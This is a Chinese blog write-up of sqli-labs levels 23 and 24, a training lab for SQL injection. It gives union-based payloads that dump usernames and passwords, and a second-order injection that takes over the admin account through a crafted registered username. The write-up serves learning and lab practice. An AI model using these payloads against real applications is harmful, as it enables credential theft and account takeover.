sqli--labs 进阶篇 23_24关

最新推荐文章于 2024-04-04 12:27:35 发布
最新推荐文章于 2024-04-04 12:27:35 发布
阅读量516 收藏
点赞数 1
分类专栏: Web安全 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47126666/article/details/128803538
版权

【第二十三关】 基于单引号的过滤字符注入

Ⅰ 直接爆点

测试是否报错,从下面的提示信息,可以知道是单引号

?id='

image.png

Ⅱ 代码审计

进一步确定自己的推论,源码中,存在过滤掉一些注释语句
image.png

?id=-1'

image.png
推测结构: ‘参数XX’ limit 0,1

利用回显确定下自己的推测

?id=-1' union select 1,2,3

实际执行:‘-1’ union select 1,2,3 ’ limit 0,1
多出一个单引号,需要注释掉
image.png

构造playload

id=-1' union select 1,2,'3

image.png

Ⅲ 注入时间

(1)爆数据库

image.png
image.png.

(2)爆数据
?id=-1' union select 1,(select group_concat(id,'~',username,'~',password) from security.users),'3

image.png

【第二十四关】二阶注入

Ⅰ 观察

可注册账号密码,不可以找回密码
image.png
image.png
image.png

万能注入,不行
image.png
到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在注册账号上入手

Ⅱ 代码审计

源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能
image.png
forgot_password.php 忘记密码处理页面
只显示图片,不用看
image.png
login.php 登录用户处理
登录界面,存在过滤和转义,不好从这里入手
image.png
login_create.php 新建用户处理
情况和上一个一样
image.png
pass_change.php 登录成功后,有更新操作的处理
更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!!
解析下那个更新sql语句
在这里插入图片描述

-- 开始注入,我们在这里,如果注册了一个账户admin
  username= admin'#  curr_pass=123   
-- 并进行,修改密码
	pass = 000

-- 开始执行修改操作
  "UPDATE users SET PASSWORD='000' where username='admin'#' and passwoorrd ='123' ";
 -- 注:csdn有审计,过滤password,这里的passwoorrd相对于password

-- 实际执行,看似我们是修改admin'#,实际上是修改了admin的密码
  "UPDATE users SET PASSWORD='000' where username='admin'

image.png

Ⅲ 注入时间

注册一个新的,账号:admin’# ,密码:123
image.png

登录进去
image.png
成功进去,开始修改密码
原密码:123
修改后:000
image.png
admin和刚刚修改的密码,直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息
image.png
image.png

参考资料:https://www.bbsmax.com/A/KE5Q4o63JL/

Lucky小小吴
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqllab闯记录(21~30)白盒测试
m0_56375711的博客
12-06 372
sqllab闯记录(20~30)白盒测试
Sqli-labs Less24 二次排序注入 - POST
kevinhanser
08-10 755
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 24: POST - Second Order Injections Real treat - Stored Injections 简介 本为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出...
SQL注入——sqli-labs第二十四_sqli第二十四,资深网络安全开发带你入门Framework
最新发布
2401_84103616的博客
04-04 713
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
九、SQL-labs的第24——二次注入(Post)
qq_73393033的博客
08-03 467
二次注入首先的一点就要在HTTP请求中提交恶意代码,将这个恶意代码存储在数据库中,以便后面使用。在第24,我们是通过注册新账号这种方式,将恶意代码存储到数据库中。假设我们的攻击目标是Dummy。
SQL注入——sqli-labs第二十四
lizhiiiii的博客
02-01 481
这一我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
sqli-labs第二十四(二注入)
qq_42266432的博客
09-03 869
入第二十四,这叫二注入,二注入个人感觉和存储型xss有些类似,大致分为以下几步: 攻击者在HTTP请求中提交恶意代码(可以是sql,js脚本等)。 应用将输存储在数据库以便后面使用并响应请求。 攻击者提交其他请求。 为处理其他请求,应用会检索已经存储的输入并处理它,从而导致攻击者注入的恶意代码被执行。 先去看看源码: login.php 中mysql_real_escape_string()函数可以转义 SQL 语句中使用的字符串中的特殊字符,无法注入 login_crea
(手工)【sqli-labs24】二次注入:原理、利用过程
07-12 789
【SQL-二次注入】
sqli-labs(24)
mmzkyl的博客
01-30 640
这个卡可能有时候会出现一些小问题,有时候登陆后是没有修改密码的选项的,这是因为有时候解压时logged-in.php文件解压不正确,重新解压即可 本卡为二次注入,其产生原因是:服务器端虽然对用户的直接输入做了一些过滤或者将一些字符行转义,但是对于已经存入数据库的信息是完全信任的,即:不校验数据库信息是否合法 先来看看本于修改代码的部分: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
基于Sqli-Labs靶场的SQL注入-23~24
Joker
01-04 1197
重点讲二次注入
sqli-labs靶场详解less-24(二次注入)
m0_72125469的博客
11-27 380
sqli-labs 第24 二次注入 超级详解 思路 教程
二次注入——sqli-labs第24
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-02 3489
首先,选择注册 盲猜有个admin的账号,所以注册一个admin '#的账号。密码是12345 (上帝视角)此时admin的密码是admin 登录 然后为admin '#修改密码为123 修改成功(此时真的是修改admin '#的密码吗) (又一次上帝视角)此时admin的密码成了123,而admin '#的密码并没有重置 这就是二次注入: 原理就是php把…………………… sql……………… 至于为什么会有 ...
sqli-labs/Less-24
m0_71299382的博客
11-19 227
sqli-labs第二十四
sqli-labs靶场-24-二次注入小应用
m0_73255659的博客
01-25 841
其实二次注入并不难理解 ,只不过可能用的比较困难需要很多的前提条件!
sqli-labs第23~25
yuqnqi的博客
05-13 167
判断为get传参,类似于前10直接在URL上输入SQL语句判断为单引号闭合与前10不同的是,注释符无效,我们去看看源码发现注释符被正则表达式过滤且为id传参,单引号闭合所以想办法不用注释符就搞掉后面的单引号于是乎,构造语句?联合查询爆数据库?爆表?爆字段?爆值payload?当然也可以报错注入和其他方法。
sqli-labs第二十四
m0_73248913的博客
02-20 342
sqlilabs第十四
sqli-labs24
10-07
sqli-labs24是一个于SQL注入的卡。在这个卡中,服务器端虽然对用户的直接输入做了一些过滤或者将一些字符行转义,但是对于已经存入数据库的信息是完全信任的,即不校验数据库信息是否合法。在本卡中,修改代码的部分是通过执行UPDATE语句来修改用户的密码,具体代码如下: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' 同时,在这个卡中,可以通过使用SQL注入技巧,利用联合查询语句来获取数据库中的信息。例如,可以使用以下注入语句来获取所有用户的id、用户名和密码: ?id=-1' union select 1,(select group_concat(id,'~',username,'~',password) from security.users),'3 以上是于sqli-labs24的一些简要说明。如果你在安装或运行过程中遇到任何问题,可以尝试重新解压logged-in.php文件,或者联系我以获取一步的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值